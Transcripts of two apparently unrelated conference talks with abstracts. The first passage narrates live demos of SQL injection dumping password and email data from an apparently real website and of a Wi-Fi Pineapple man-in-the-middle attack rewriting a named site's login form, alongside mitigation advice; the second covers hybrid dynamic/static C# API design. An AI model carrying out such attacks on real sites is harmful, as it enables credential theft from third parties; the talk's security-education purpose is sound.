Azure behind it. There's nothing wrong with Azure. It's just a crappy web app. Now we know what the database is but that's not good enough. Let's get the tables. So go to the tables button. Okay. And let's click on get tables. Very good. Okay. So this is going away making more and more and more HTTP requests. Okay. Now let's, what looks good, Jeff? What do we want, mate? Let's go with membership. Well, tell you what, let's get in a user profile. Good choice. That was my second choice. All right. Now let's get the columns. Okay. So we're going to get the columns. It's always nice we can do this with a GUI, isn't it? All right. Now what should we get? What data do we want, mate? Password. Yeah. Password would be good. We're going to need something else though if we want to hack this. Yeah. Let's get email. Good idea, Jeff. All right. Let's get the data. Oh. Oh. Round of applause for Jeff. Well done, mate. Look at that. Thanks, mate. And that's how SQL injection is done. So the other day I was saying SQL injection is such a risk. And it's number one in the OWAS top 10. It's number one in just about every sort of risk assessment thing you see. The reason it's such a risk is that it is so easy to exploit. So we did one Google search. First result, clearly we didn't go and hack that Swedish website exactly. But I imagine if somebody was to hypothetically do this, they would get the same sort of data because it is so easy. And this is why you're seeing kids with mums who have pissed off taking them to court because they've just SQL injected some website. That's how it happens. Okay. Let's do one more. All right. So let's have a go at Swedish websites with insufficient SSL. Now this is a really fun one. So what are we going to need? One Google browser, one Wi-Fi pineapple. Okay. Okay. Now, here's what we're going to do. We're going to pick a site and we're going to pick a Swedish site called expe-es-s-d-n dot s-e. Let's have a look at the Swedish website. Now, I did go through and have a look at sort of the same Alexa top 50 or 100 or whatever it was Swedish websites in order to find one that would meet my needs. And this one, which is going to appear any moment now, is the one that I chose to use. It's number five in the Alexa top 100. Oh, man. Holy shit. Okay. Norway's off the hook. I haven't seen that before. All right. Okay. So this is a legitimate website. We're loading it real time. Does that say something funny that I don't understand? Okay. Now, we can log it in. Now, is this a secure login? Why not? Ah, but, but, but. Let's inspect the form. Inspect element. Oh, oh, oh, oh, oh. Let's close Fidler and reload this page. Damn it. Let's try this again. Rewind. Let's log it in. Inspect this element. I hate it when I do this. All right. So if we have a look at the form URL, it posts to HTTPS. So it's secure, right? Because when it posts to HTTPS, it's going to encrypt the credentials when they get sent to the server. All right? Yes, it is. No, it really is. If we post this form, it will encrypt the credentials when they go to the server. Now, here's the interesting thing though. When we load this page, it's not loaded securely, which means that if you can get in the middle of the communication and you can manipulate the contents of the page, you can change what's going to happen here. And it begs the question, how do you get in the middle of the communication? And that's why I got this little guy just here. So I'm going to take this. This is the Wi-Fi pineapple. This was in the instructions next to the Allen key. So this little guy is a wireless access point. And in fact, it does a couple of things. So it's a wireless access point that you can stand up just like any other wireless access point. And I have stood this wireless access point up and given it an SSID of free NSA Wi-Fi. Now, I'm guessing that there are a lot of people who have seen free Wi-Fi and not seen NSA and gone, okay, let's jump onto it. The other thing it can do, though, is it has a little feature where it can look for what we call probe requests from your devices. Now, what a probe request is, is when you connect to a known network and you say, remember this, so that when I come home later on, I can automatically connect to the network, what's happening is your phone walks around continually blasting out, probing for that network. Now, what it means is that the pineapple can see that and it can turn around and it can change its SSID to the one that you're looking for. And then your phone says, well, let's get it on and we'll connect and we're all good if there's no encryption on that network. So what I can do now is I can go to the Wi-Fi pineapple interface. And this is a nice, this hacking tools are getting so good because they've got GUIs and it's all friendly and no green screens. And if we still have a connection, we can go into Karma, which is hopefully going to load the data from our Wi-Fi pineapple, which it is not. Well, in doing this, anyone in this vicinity have a look at your network and see if you are seeing networks that you know, okay, which would be the really, really interesting thing, or free NSA Wi-Fi. Well, there we go. It's back. Now, one of the problems is when I do this at geek conferences and there are so many freaking Wi-Fi devices, the whole thing, it's loading honestly. The whole thing just gets a little bit overwhelmed. So let's see if we can go into the Karma log. Otherwise, you know what, it's working, but there is so much data in here. Let's try and remove the duplicates. Let's try and apply the filter. It is massive. So what I'm going to do is I'm going to try and grab one of my shortcuts. Just look at all my secret demo bits and I'm going to try and grab the log path. So basically, it's just building up a file on the system with all the log data. And I don't think it's actually going to load, but what we normally see is all the network names that are being probed for. So I can actually give you an example from my room earlier on because I ran a little demo of this just to make sure everything would work and I took pineapple images. And this is the sort of thing that we normally see. So this was in my room and what we're seeing here is my iPad and my iPhone and we can actually see that my iPad I deliberately connected through to free NSA Wi-Fi because I wanted to test it. Often I see a lot of other people connect to free NSA Wi-Fi because they want free Wi-Fi. My iPhone connected to an SSID called Radisson Guest. This is not Radisson Guest, but because my iPhone was saying where is Radisson Guest, which is an open network, the pineapple responded. Now, I don't know who Amy is. Maybe I should have removed her name. But Amy's iPad connected to GitHub Secret. So she was probably near me, so sorry Amy if you're in the room, and GitHub calling it Secret doesn't make it so. So it actually broadcast that name back out. Now if anyone is actually connected to the device and they just simply overwhelming things, what's happening is you're connected to the device and then it routes the traffic through the ethernet cable into this machine and then out over the normal Wi-Fi. So effectively this machine and the pineapple can man in the middle of the connection. Now if I try this again, I'm just going to open Fiddler because I can replicate the behavior when I have Fiddler open. If I try this again and we reload this page this time, see, it was the little bit that I was hiding just before, and we're going to get, if we go back to the form, and we go into here and we inspect the element, and we go to here. Okay, so we're seeing a different URL here. Okay, we're posting to a different URL. Now the way the pineapple does it is that you load this form and effectively your device is now through this malicious network and this form makes a request for a JavaScript file from an HTTP address and because it's an HTTP address and it's not the secure connection, we can do things to it. We can do things like instead of actually returning the JavaScript file from that source, I can serve one up from the pineapple. So the pineapple with its little built-in web server has served up its own JavaScript file and that JavaScript file has rewritten the DOM and that's why we're seeing that this now posts to a different URL. So if I go in here, what's a good Swedish name? Sven. I like here. Bok, bok. And I fill in other details and I submit it and the internet works. Hopefully. Of course we know where it's going to go and the point is that we can actually redirect where that form posts to because the form was loaded in securely. Now that is actually going to post to the same website. It should look like that. Yeah. All right, so what normally happens is this page loads, the email addresses there, the passwords there because we've changed the form action so we've actually sent it off to another URL. Now the point of all this is that it comes back to any part of the connection which is not secure can be compromised. It can't just be read, it can be manipulated. So what that means for login forms is you've got to load the login form over HTTPS. If ever you see a login form and you don't see a padlock and I showed one a couple of days ago for GoDaddy, login form, no padlock, the connection can be compromised. And we've seen this happen in cases before. We've seen things like the Tunisian government compromising people's connections when Facebook was loaded over HTTPS for the login page. So ultimately that's what anyone with a compromised device should be seeing. There are too many of you, you have over compromised my pineapple. But you should hopefully still see those SSIDs there. And that was the slide which should have gone first. Home is where your Wi-Fi connects automatically. That is the risk of open Wi-Fi and that is the risk of not having HTTPS in your connection. And with that, I'm done. Thank you. So I think we've got a few minutes for questions. If anyone has any questions? Any questions at all? There's one over there here. So the problem with the salting and the hashing is it's just one round of Shah 1. And effectively the problem is it's too fast. So in the newer versions of the membership provider you've got a thousand rounds. So it is now 1,000 times slower to do the same thing. And a lot of people say that's not fast enough or rather that's not slow enough as well. It should be 5,000 or 10,000. So really the lesson there is don't use the old membership provider. Use the current one and preferably use something even stronger again. Other questions? Over there. Sorry? What is something stronger again? So there are, first of all, from an algorithm perspective there are things like B-crypt or script. The other option is to increase the iteration. So instead of a thousand rounds of Shah 256 I think it is, to increase it which unfortunately you can't do in a configurable way in ASP.net. But you can go and look at things like Brock Allen's membership provider reboot which gives you more configurability. There are a few others out there as well that allow you to effectively increase the workload of hashing a password because that's what you want to do. You don't want it to be too fast otherwise stuff like that happens. Anyone else? Over there? It could. I guess the issue there, so the question was can the browser be a little bit smarter and actually tell you where it's going to send the credentials to. The problem is I guess from a consumer perspective how are they going to deal with that. Particularly when you just see URL somewhere, you know, do you want mum and dad saying it's going to go off to blah blah blah blah secure dot so on and so forth. So it's probably a little bit tricky usability wise. The other thing is in the Facebook example I gave before when they compromised the login page they still posted to Facebook but they made an asynchronous parallel request sending the credentials off to another URL. So the post path was still correct but it was still stealing passwords. No? Yeah but it doesn't, so now it's saying doesn't it tell you if you're going to post credentials to an insecure path but it's still posting to a secure path. Yeah, well that's so there's the other issue. If you give people security prompts saying do you want to do this or not they always say yes. It's hard to give people security prompts and have them make informed decisions. Anyone else? Okay, no more. Alright, well thank you very much everyone.
|
Have you heard? Apparently we’ve created a dreadfully insecure internet with vulnerabilities reaching so far and so wide that literally anything is obtainable online through covert methods. Often this involves the now very well-known yet frequently present classic exploits – SQL injection, cross site scripting and others – but now we’re also seeing new attacks against security defences such as two factor authentication. In this session I’ll take you through how the risks we, as developers, are building into web sites and APIs can be easily exploited to gain access to everything from credit cards to credentials to control of commercial facilities. For many people, they’ll be stunned at the simplicity of the risks that continue to be exploited whilst for others, risks they never knew existed will be exposed, decomposed and most importantly, the mitigation will be shown. This session recreates real world examples of attacks against airlines, ticketing systems, hotels and transportation services – enough that someone literally could hack themselves all the way around the world to Norway. It’s not a theoretical exercise; these are real world attacks by real world hackers laid bare.
|
10.5446/50873 (DOI)
|
Good afternoon, everyone, and welcome to the last talk of the last day of the conference. It's Friday afternoon, so I appreciate you coming here, and today we're going to talk about some aspects of API design. My name is Svagiv. I work for Norwegian company, Miles. I'm originally from Russia, but I've been living in Norway for over two decades. You can find me on Twitter. You can mail me if you have any questions. And if you find interesting what I'm going to talk about, please check out the GitHub repository, which contains everything I will show you plus some extras. So our focus this hour is some aspects of API design in modern times. Who was at James Newton King session about API design yesterday? Okay, it looks like I was the only one. Okay, that was a great session about focusing on how you design API in a way that developers feel at home, like they feel familiar with the way they used to work. James also recommended a book which has become a classical book from 2008 framework design guidelines. But looking at this book today, I find that some of the recommendations, they have to be taken with care. For example, just to give you an example, it recommends use of lazy values. You have something like get schema and then if you have property schema, it's lazy property, which just read on demand. But with modern APIs, if you are careful about asynchronous calls, then you have to be very explicit about what and how you fetch. So actually lazy doesn't play very well with our synchronicity. And there are other aspects of that. So modern times API come with some additional precautions to make it both consistent and flexible. And this is not easy. It used to be much easier 10 years ago. If you had to choose framework and main programming language for development 10 years ago, and if it was C sharp and.net, there it had to be object oriented programming with class hierarchies and interfaces and of course, strong types. So it was relatively narrow window of opportunities compared to modern types. And nowadays when people write mission critical back end systems in JavaScript, of course, this can't get unnoticed in traditional platforms. So even though if you doing enterprise development in C sharp.net, you will be influenced by that. And it's not just a conflict of generations when the father has been doing all his life J2E enterprise programming and the son is hanging with some Ruby youngsters. The choice is more complicated and maybe more confusing because this happening to the same language, to the same platform which is traditional in a way for us. First C sharp was extended with elements of functional programming and it happened around 2007. It was driven by link development and it spawned such innovations like lambda expressions, extension methods, all these fit very nicely in functional paradigm. And it didn't actually create a kind of conflict with traditional development. It came as a nice complement. But what happened in 2010 when the language and platform has been extended to the so-called DLR dynamic language runtime, in many scenarios, well at least some scenarios created some alternatives to a traditional way of doing statically bound class resolution. So suddenly we could start writing code and compiler didn't take any responsibility about how this code will be resolved. So suddenly it was possible to write absurdly looking code. As long as you wrote a word dynamic compiler kind of washed his hands. So that affected not just properties and methods. As you can see here you can mix apples and oranges. You can multiply grids by integers and as long as there is dynamic object in operation, compiler doesn't care. So needless to say that that was met by some skepticism, by some developers. And first example that Microsoft published on MSN, the computation website, there were rather minor improvements. Like here you can get rid of typecast when it comes to com interop. And you can say that this second example is nice looking because you don't have typecast. But some developers would argue that the code is also deceiving because it actually looks like it's compiled, statically compiled code but actually it is not. But soon developers brought more radical changes to all that. And they started using dynamic programming to gain greater achievements. So if you look now at how dynamic library simple data is used, you can see that the whole API looks like it's written specifically for our domain. You have database with property users, with method find all by email. And of course there is no such property, there is no such method. So what simple data does is that it talks to the database and it pretends that there are such methods and properties as long as there is a table of users in the database and there is email column in such table and the rest are just conventions. And it's also smart to convert it back to user entity. But you didn't actually have to declare the entity DTO because you could just send back dynamic object as long as client would accept it. And here this example demonstrates even more radical code saving, not just saving on DTO and some proxy generated classes. Everyone working with acceptance test development in.NET or BDD, of course you could recognize this gerkin language and underneath is a so-called step implementation using spec flow. But these two lines, they can replace maybe 50 or 100 lines of boilerplate code. Because if you had to write this code yourself, you would start parsing this table and extracting values and then you have some DTO and you put this value there, then you have data access layer and maybe another DTO, you have to have adapter maybe use auto mapper and so on. So it's not creative work. Here two lines of code actually taken from two different libraries. The first one is spec flow assist dynamic and the other one again is simple data and they interoperate nicely. So obviously there is a great code saving and that was convincing for dynamic libraries to stay in the static code world. So popularity of dynamic libraries is growing and you can see just some examples from various areas, some very successful examples, signal R, Nancy, simple data, there are other database micro or M like massive for example, easy HTTP, you see they cover different areas and they really save us on code typing. So I'm not going to answer the question whether you should use dynamic libraries because this talk is about different thing. We are putting the hat of API designer and trying to answer different question how to actually reach out why the group of developers and some of them may prefer dynamic API, some of them prefer static API and then right now you have to choose basically. If you like to consume database classes using dynamic API, it must be massive, simple data or something similar, otherwise it could be a hybrid or an audience different work. But our focus is to expose a single API in a hybrid way. So you can write both dynamic and statically typed clients which will talk to the same operation set. And we will also look at how it's best to package this API because what we are going to show is actually cross platform library which can work even on iOS and Android devices using Xamarin tools and not all platforms support dynamic like Silverlight 4 doesn't support dynamic, Windows 7 doesn't support and iOS only has experimental dynamic support which in practice means it's not supported. I tried that. So you have to be selective. So how can we package it in a way that it can be deployed smartly? So having said all that, just on a side note, the choice of going for dynamic, use of dynamic typing in your C sharp code depends ironically maybe not on external interoperability because dynamic is very good and dynamic C sharp is very good in to implement interoperability external services. But ironically again, the internal interop with statically typed C sharp is not always smooth. Just to give you a simple example, if you consume a lot of data using dynamic C sharp in collections, you would expect to be able to use link operations. But link operations like single, first to default, count, they all come as extension methods and extension methods resolve compile time which means they can't be applied to dynamic objects. It will result in runtime exception. So you will have to explicitly cast as inumerable of dynamic for example. So if you have a lot of such integration points, internal points, they can become pain point. So bear this in mind. But if you properly arrange where dynamic blocks can be used, you will have great code savings as we saw in a few examples. So we'll use database access as our main domain because this is something that everyone understands. So this is a database access code written using link, using fluent API. And this can be alternative written using dynamic API that we have methods find by company name, select company name and year. So we will simulate domain ubiquitous language in a way or domain entities at least. Alternative to that is that we actually expose the same operation set. So if you talk about database access, there will be where select or the buy and so on. And we will differentiate inside these operations by implementing several overloads of both dynamic and static clients will work. And of course the choice of API style is very open-ended question because as an API designer you probably have some strong feeling about how it should look. But those who were on this James Newton King talk, and apparently it was just me, but those who read this framework guideline book may recall, there was a phrase coined by Brad Adams, one of the co-authors of this book, the power of sameness. So the sameness, like operation sets or different APIs looking the same give you some power. So this is the question is not choosing the style for your API. The question is do you want to expose two APIs, dynamic and static ones or just one? So what I will try you to convince is that the single API set will give you better possibility to reach out wider development group relating themselves just to single API. So we will have some API common core and the simplified version of the interface will be like this, so this method they can be changed. And we will implement something smart inside. So both dynamic and static clients can use that. So with one API, two paradigms. You see this two code example, they look similar. In fact, dynamic version looks a bit short at least in the actual calling part because you don't need to specify lambda expressions. You just write directly dynamic expressions, but you need to define this expression object somewhere. And it can be just once for the whole application because this is not real storage. You will never need to persist it. This is just used to send to methods and convert, do some conversion. So this is our approach, exposing single API that can be consumed in that way. One question which I already received is what about the extra cost? Do you need to implement a lot of stuff if you do it that way? So this talk is actually based on real world project. There is an open source library called simple data client that is hybrid API. It's portable cost library, which supports both dynamic and static calls. The dynamic wrapper, it took six classes and 59 lines of code. When I was working on this talk, on examples for this talk, I actually did more, did better support for this in the dynamic wrapper. So it took me 76 lines of code. But what I'm trying to say is that the overhead is pretty much fixed. You just implement some magic in your dynamic wrapper and that will be the same number of lines of code almost no matter what the cell you are exposing. There may be some variations, but the core part is the same. So there is no dual implementation. There is no re-implementation. You will never repeat yourself when working with these libraries. So this is our strategy for a hybrid API. What we are going to do is we will package our domain logic in statically type library and we will expose just statically accessed methods. We will use link expressions because it gives your DSL very good expressiveness. And this link expression we will parse and store in some custom expression. Then we will add a small wrapper, which will be dynamic wrapper, where we will subclass our custom expression. So our dynamic calls will be sending this subclass instance of expression, which will be converted into the custom statically type expression and the actual execution is fully statically typed. So just to give an example of simplified example of implementation and packaging. So you have some library finder DLL, which will work on all platforms supporting modern.NET, which will have interface I finder and there will be two overloads. Find which takes link expressions and find takes this custom expression, that's called query expression. Users will never have to think about this overload. They will never relate themselves to some explicit choice of this. It will just happen to them. But the second overload will actually be used by dynamic wrapper that will send their subclass version of this query expression. So this is how it will work. And then the client code might look like this. So in statically typed client we instantiate our finder and we send link expression to it. And by the way, our link expression parser, it's pretty much how it works also for real world link expression parser. So actually it's not very long way to go from that implementation to have link provider. Of course you will have to implement things like Iquare about deferred query execution, but the actual tree parsing is there. And then dynamic client looks similar. Again, you just need to declare dynamic query expression and you can send it around using almost the same syntax and it will be converted to the same link expression. So plan for the rest of the talk is go through the case study. We are going to work with SQL commands, which of course everyone understands what it is. As I mentioned earlier, so the implementation just extracted part of open source project with changed domain error because all data protocol is not something that everybody is fluent in. And we will incrementally grow our implementation until we see it works well for static line, dynamic client and even mobile client. So our case study is hybrid SQL command builder. So as you probably have understood, we will be writing something like link provider. And this is traditional link statements using different syntaxes both supported by C sharp compiler will focus on the second one, on the fluent syntax. And this is supported subset of SQL commands. It will be of course shorter, smaller subset than real SQL. There will be no join, but there are no principle difficulties to implement stuff like join. It just requires more work, but the design part is the same. Just to give you a quick idea of the scope of our work, if we were dealing with hard coded strings, our untyped version of command builder might look like this. This is interface that takes some magic strings, which nobody likes, chain them, and then we call build. And in this build operation, all the strings can be connected together and we build final command. And the command class will have, again, string fields for tables, for condition, for selection, and order by columns. And the actual building command is really simple and anyone would probably implement it in a quarter of an hour, because you see that's a whole code. It's just string concatenation and list concatenation, so we will get this subset of supported SQL commands. So moving on to types version. So now we need command builder of T. And in order to get command builder of T, we'll need to inject somewhere T. So we'll have two interfaces. First one is non-generic one, where we will be sending the actual T, which may be companies or persons of our entity set, entity class. And this command builder, non-generic one, will give us generic one. And from there, we can send generic link expressions. So this is a typical usage example. We'll get instantiate command builder, and then we'll run right from companies. At that time, we're getting typed version of command builder. So we continue then with x, which is x of companies. So we can choose any properties of x of companies, and everything will be statically compiled. So if you write something that doesn't make sense, we will get compiler error. That brings us to link expression trees, and this slide lists the number of link expression tree nodes, which is exactly 84. And of course, it gives a question, do we really want to do that? Who works with parsing link expression? Well, I have full understanding for that, because it really looks scary. In fact, when you start working with it, it's not that scary. Yes, there is a lot of open source code around, which you can use as example. And my project is also at GitHub. So if you use some time on it to make ends meet, then in return, you will get very, very good expressiveness, because in many cases, the DSL that uses link expression trees is much better to express your intent. Previous talk was about elastic search, and of course, one of the examples of them was link provider for elastic search. Because whatever search type you implement, link will work very good, and it doesn't have any to be search. Most of the things which we are doing, a lot of it, it's getting some type data using some criteria. So link expressions are very good into implementing that. This is an example of link expression tree, which probably shows why there are so many nodes, node types. So above, you will see an example of link expression, and this is how it's represented internally. So there are 12 nodes and four of them leaves, and you start from lambda, then go to end, which is actually called end also, greater than, less than, member access, which member accesses to access properties, constant, to access constant values, which are in red, and so on. So it actually makes a lot of sense once you start digging into it, and there are some things to remember. One of them is that you will probably want to convert C sharp functions to your DSL functions. For example, if it's sql, you will want to support stuff like len in SQL, which corresponds to string length, in C sharp, so you will need some function maps. You will need to interpret operations. So you will have to plan to list all supported operations, functions in your DSL, and then map from link expressions how you would interpret them. You don't need to support everything. You can just throw exceptions if you're not supporting them. So just to give you a little insight about how this can work. So this is an example of the project. And go to solution. I will probably need to... Yeah, this is solution, and you see this SQL command builder. This is typed version. And tests. And you see most of the typed version is about expressions, how to deal with them. So if you look at function mapping, for example, these are my functions. On the left side, you see C sharp functions and how I map them to SQL. The core of the expression parsing is that I go through this... Here I manage my expression trees. So parse member expression, parse call expression. So yes, it's... This file is about, I guess, 150 lines of code. But if you see what happens when we try to debug the tests, you will soon get picture of what's happening. So here we have where expression. And this is expression x company name equals dynamic soft. So we can... What we can do, we can step in. We're stepping in, parse link expression. Okay, parsing begins. Not type. This is a binary expression. So we're parsing binary expression and so on. The left expression here is company name, right expression, dynamic soft. So we just continue that way until everything is parsed. And then we reach the build phase. Here actually we have a command already built because I overloaded two strings and now it actually shows what we will get. But here's the builder. And it's more or less what I showed in that slide. We have string build and we just can continue strings. So the most demanding thing, of course, is link expression parsing, but it's very powerful thing. And if your DSL is rich enough to justify this work, I really recommend to have a look at that. So this is type command builder workflow. So we take from and some table name. We assign the type and generate generic builder. Then we assign where expression. And we convert it to our custom expression, which is command expression, and we build. So we actually are halfway through. So now we have a type command builder. So now the interesting part, how we add something to it so it will magically consume dynamic clients. So what is left now is if you look at type command builder, you remember that stupid examples of using dynamic object, which I showed you, that you just type word dynamic and then compiler doesn't care. So you actually, you can send your dynamic objects right here. And compiler won't care. They will compile, but they will fail. Because the challenging part is that nobody knows how to map your dynamic expressions to link expression trees. And the solution to that, if you implement overloads for your interface, which will also take not just link expression, because we don't have control over.NET expressions, but it will also take overloads, which will take our command expression. So this code will become possible. So let's recall our strategy and we are somewhere in between. So now we are about subclassing our custom expression. So but before we do that, we need to enhance our command builder. So we start overloading methods. So our first non-generic command builder had only one method. Now it has two. And the second one takes command expression. The same goes for generic command builder. You see the number of methods doubled. But the operation set is still the same because these are just method overloads. We as developers, we never care how many method overloads certain interface or class has as long as everything happens for us smoothly and we don't need to explicitly make a choice. So where we'll have two methods. So type client will use the first one and dynamic will use the second one. And it's compiler who will make a choice for us. The same goes for order by. The same goes for select. And you can see that in case of order by and select the overload, actually takes an array of command expressions. So we can write a list of dynamic expressions and compiler will choose that overload. And adding method overloads and implementing them actually is trivial because our original typed version already includes code which is shown in the first method implementation. We take link expression and we convert it to our custom expression. And since in case of dynamic client, it's the second overload in walked, which already takes our command expression. We don't need to do anything. We just assign it to our command. What is less trivial is to add this conversion magic because we have to convert this dynamic expression stuff into our command expression. And usual or traditional implementation of dynamic objects is to subclass.net built in dynamic object helper. It won't work for us because we want to subclass command expression and C sharp doesn't support multiple inheritance. So what we'll need is to implement interface I dynamic meta object provider. And then we can subclass our command expression. But believe me, it's not much more lines of code, which I'm going to show you right now. So if you look at dynamic version, which is the project here, yeah. So there is a just to enlarge it. So this is the old like first typed version is almost untouched. We just needed to add some overloads for interface. But there is a new project here, SQL command builder dynamic. And by the way, if you look at what it supports, you see that it supports dot net framework for two at five in this eight in this four, so eight, the marine Android, the marine where I S. Well, when it works on I S finally, currently, it won't work in our S, but support is already there. So it's portable class library. And if you look at the content of it, it's all it's those 76 lines of code, which I mentioned, which basically what they do is they implement some binding functions bind get member bind set member. What these functions do is whenever there's dynamic expression coming to us, C L R gets lost. Okay, there's something dynamic. What what how would I deal with that? We have to answer this question. Okay, I recognize that and I return this and return our typed object. If we don't answer this question positively, then exception will be thrown. So let's have a quick look at unit tests and then the same test we will run it in debugger in dynamic version. Oops. Let me see type. Okay, it's type test. I have to run dynamic dynamic tests. Yeah. So it stops here. And get member and here we have some binder. What is binder? Yeah, and you can probably here is seed here. And if it's too small, I can tell you that this says companies. So we have a binder with the member companies. So which mean that there was some statement which says X dot companies and then they are and C L R they get both lost. So we have to say what to do with that. So what we're doing here is that we create expression constant from binder name. So this is because we converted to our custom expression based on binder name. So we continue doing that with all other expression that we receive. And then we see that the test passed. So there is a very small chunk of code where we implement the handling of incoming expressions. And it's a relatively inexpensive thing. So you just have to interpret according to domain language. You might check catalog of your database tables, for example, and throw exception if you find something that you don't encounter. So and in case of dynamic command builder, the last part is just follow type builder workflow. But we begin from a different place. We start from dynamic expression. We try compiles selects us command expression based overload and we do conversion. And then we continue just as it was type command builder. Now we're finished with SQL command, hybrid command builder. But there is one other aspect of this. How should we deal with return values? Because when we're sending data in, it's understandable. We have some expressions. We map them, convert them, and then we have this hybrid API. But what if we have dynamic clients and type clients? And type clients will expect types of companies and while dynamic clients will expect some dynamic object. And to show how this can be done, I extended this project with command processor, which is very simple. It just has a couple of methods. Find one and find all. And this is how it's used in typed version and dynamic version. So, and apparently there are some extra extensions to our dynamic wrapper we need to add. Both for returning typed results and for returning dynamic results. First we're going to type the results. If we want to convert whatever execution engine returns to us, we need to have some extension method that will map it to our empty object. Because whatever database engine you're using, it's doing its work using some internal data. If it's MongoDB, it will be a BISON. If it's SQL Server, it will be a table of data streams. But it doesn't know anything about your types. So you will have to do some work. And this is done by implementing reflection-based conversion. So I have a couple of extension classes, two object of T, which actually fixes that. And so I can get companies and collection of companies when I send and execute the query related to retrieving companies. Unfortunately, this is not sufficient for dynamic clients to be as smooth as typed clients. Because if I don't have any typed objects in my dynamic client, then I will get some additional string of object or whatever internal type my execution engine operates with. And also I would like to be able to fluently convert to typed versions from dynamic client. So in a similar way with command builder, we have command processor that has overloads. And instead of returning row data, we encapsulate our results in result row and result collection. And we also introduce dynamic result row, dynamic result collection. And likewise with command builder, for clients, it's all unnoticed. Clients will just use them as everything flows naturally. You can see here that dynamic client is now fine. So you can get dynamic results. You have var result, which will probably get dynamic object. And you have also typed result. And what will happen is that our dynamic wrapper will again call another bind function to try to convert it to whatever type we supply. So just to give you a quick insight on how this might work. So I'm now on this project. And if I look at my dynamic projects, you will see that there are three classes. We used to have only dynamic command expression. Now we have dynamic result collection, dynamic result row. And this is because we need to implement these small conversions. If you look at dynamic result row, for example, you will see there is a method bind convert. So what happens is that when there is an attempt to convert dynamic object back to static type word to company or collection of companies, we will get a method called here saying, okay, this is a request to bind to convert. I can show you actually with some unit tests. Let me see here dynamic test and execute find one S type. So this probably should hit that break point. Yeah, it did. So there is a binder here. And you can see that the binder says return type companies. So this return type is completely unknown to us. So we get a request. Somebody is trying to cast your dynamic object to companies. And we can, since we have a type, we can check what properties we have there. Maybe it's a good match. And if we receive from the database stuff with name, first name, last name, and there are matching properties in that type, we will try to convert. So type command processor workflow is simple. You have a sending command as before. And then, but you're also trying to get results back. So we execute processor, get execute, get results. And then we have some internal data type. In this case, I dictionary of object, just for the demo purpose, which is converted using some extension method to object of T. And in case of dynamic processor, there is a conversion to object of dynamic result collection. And then there will be hit bind convert method in our dynamic wrapper to convert it to other types if necessary. A couple of words about cross platform portability. As I said, these libraries, I implemented a sport of course libraries and work on all modern dot net platforms. And they don't have any other external dependencies. So they are just a row and can be used as example of how you can implement this stuff. Of course, legacy platforms out of the picture because they don't have support for dynamic stuff, but you can use type version and deploy it on civil light for clients. So you can be selective with what you deploy on each platform. Just to give you, let me see, idea of how it might work here. I have a, oops. What happens? Well, you see anything? Sorry for that. But I, excuse me, I may need some help. Okay. It's coming something. Okay. Yeah. Yeah. You know. It probably heard word cross platform. So then it gets scared. I wonder why it's that. Okay. Let's try anyway. So I want to deploy it on. That is strange. Can it be something with a cable? No. It just keeps resizing things. So if you go back to show point, it looks fine. If I go to visual studio. Okay. Try to deploy. So what I'm doing now is I'm deploying it to the Android simulator. I also have Windows phone and IS. Okay. It's deployed. Yeah. Probably while you hear it, it works better. But hopefully it will work. Okay. Ask or come on, build a test. So let's start it. And I will start in a few seconds run test. So this is just a small test. I just want to test runner which runs tests and both typed and dynamic and there are 28 tests passed. I've also the same I did for Windows phone and for IS. I will not take chance on running our simulator. Now because I have to switch to native modern Mac. So you have to believe me. This is a screenshot. I haven't made it up. It's just a real screenshot. But you will see that there are a few tests because I had to exclude all dynamic tests. But typed tests work. So this stuff is proven on all modern platforms as long as dynamic is supported. So conclusion. Yes, it takes some extra effort to design API properly. But if you really want expressive API, you will find that benefits will outweigh, may outweigh some extra effort. And also as you saw, the number of line of codes you need to reach both dynamic and typed clients is really not that big. So if you have a library that can be exposed for dynamic clients, I would recommend to use this approach which doesn't need to work with link expression trees. You can actually create your own classes. But with link expression trees, you gain some additional expressiveness. So the moral make hybrid API and not hybrid war. And while we have a few minutes to go, since it's now Friday and it's late, so I want to give you a little boost. And I invite you to sing along with me a karaoke song about the material which we have just gone through. So this is inspired by song by Queen. I'm going slightly mad. And of course, if you have song with such lyrics, you can tweak it to sing about anything. And it's a new variation. It's called I broke my static types. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. And I have only one chance left to find all my code at runtime. It won't be run until Monday. And by the time I'll be free running through yellow daffodils, climbing on a banana tree. I broke my static types but I wrote dynamic code. It finally happened. It happened. It finally happened. It finally happened. Dynamic code. So this is summary of our hybrid advanced strategy. You just expose static type API. You implement your dynamic extensions in different assemblies where you only deploy it on the platform that supports. And then everything will go fine. I'm calling now funny message. My brother just wheeled it through. I import system dynamic this days. But my dear how about you? I wrote dynamic code. And you should write dynamic code. It finally happened. It finally happened. Oh yes, it finally happened. Dynamic code. It's all dynamic code. And there you have it. Thank you very much. I'm Bagif, working for Miles. I hope you have enjoyed the conference. I wish you great weekend and bon voyage if you came from different place. Thank you. And I'm probably open for some questions if you have any. Does it feel something that you might find applicable in your projects? With some DSLs? If you find something, take contact with me. And I will try to help you out. Thank you. Thank you. Thank you.
|
Now that we can declare dynamic objects in C#, how should we define our APIs? Typed, dynamic, mixed? In this session we will learn that sometimes it's useful to create an API in two incarnations: as strong typed and dynamic one. Such API can be adopted by developers with either preference and exposed to .NET platoforms that lack DLR support. We will study the principles of designing a dual API, demonstrate how to ensure maximum code sharing between typed and dynamic versions, and how to package and publish library files so they can be consumed on variety of .NET platforms, including iOS and Android. We will also talk about added value that dynamic support brings to C#, looking at real-world examples such as dynamic view models, micro-ORMs and REST services. Last but not least, we will build and run code samples on Windows and Mono.
|
10.5446/50875 (DOI)
|
